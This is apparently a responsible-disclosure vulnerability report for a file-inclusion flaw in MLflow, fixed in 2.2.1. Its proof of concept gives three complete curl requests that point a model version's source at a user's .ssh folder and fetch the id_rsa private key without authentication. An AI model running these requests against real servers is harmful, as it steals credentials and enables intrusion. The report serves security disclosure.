Description

Local and Remote File Include in MLflow

Proof of Concept

Start the server or UI (it works on both identically)

mlflow ui --host 127.0.0.1:5001

Create a model

curl -i -s -k -X $'POST' \ -H $'Host: 127.0.0.1:5001' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' -H $'Accept: /' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://127.0.0.1:5001/' -H $'Content-Type: application/json; charset=utf-8' -H $'Content-Length: 19' -H $'Origin: http://127.0.0.1:5001' -H $'Connection: close' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \ --data-binary $'{\"name\":\"AJAX-API\"}' \ $'http://127.0.0.1:5001/ajax-api/2.0/mlflow/registered-models/create'

Arbitrary “name” parameter to be used in the following two requests.

Create a model version

curl -i -s -k -X $'POST' \ -H $'Host: 127.0.0.1:5001' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' -H $'Accept: /' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://127.0.0.1:5001/' -H $'Content-Type: application/json; charset=utf-8' -H $'Content-Length: 55' -H $'Origin: http://127.0.0.1:5001' -H $'Connection: close' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \ --data-binary $'{\"name\":\"AJAX-API\",\"source\":\"file:///home/danmcinerney/.ssh\"}' \ $'http://127.0.0.1:5001/ajax-api/2.0/mlflow/model-versions/create'

This is where we set the folder that we want access to. In this case I set the JSON parameter “source” to “file:///home/danmcinerney/.ssh” so that I can access the ssh private keys.

Get artifacts

curl -i -s -k -X $'GET' \ -H $'Host: 127.0.0.1:5001' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' \ $'http://127.0.0.1:5001/model-versions/get-artifact?path=id_rsa&name=AJAX-API&version=1'

The “path” URL parameter can now be set to any file in the folder specified in the previous request’s “source” JSON parameter. Note that you can also access other network resources by setting the previous requests’ “source” path to things like “s3://bucket/model.pkl/” which extends this from just local file include to remote file include as well.

This works out of the box on a default installation remotely and with no authentication.

This bug was privately disclosed to MLflow via their Security policy of emailing [email protected] already so no need to contact them again. It has been fixed in the 2.2.1 release. This report is for the CVE submission.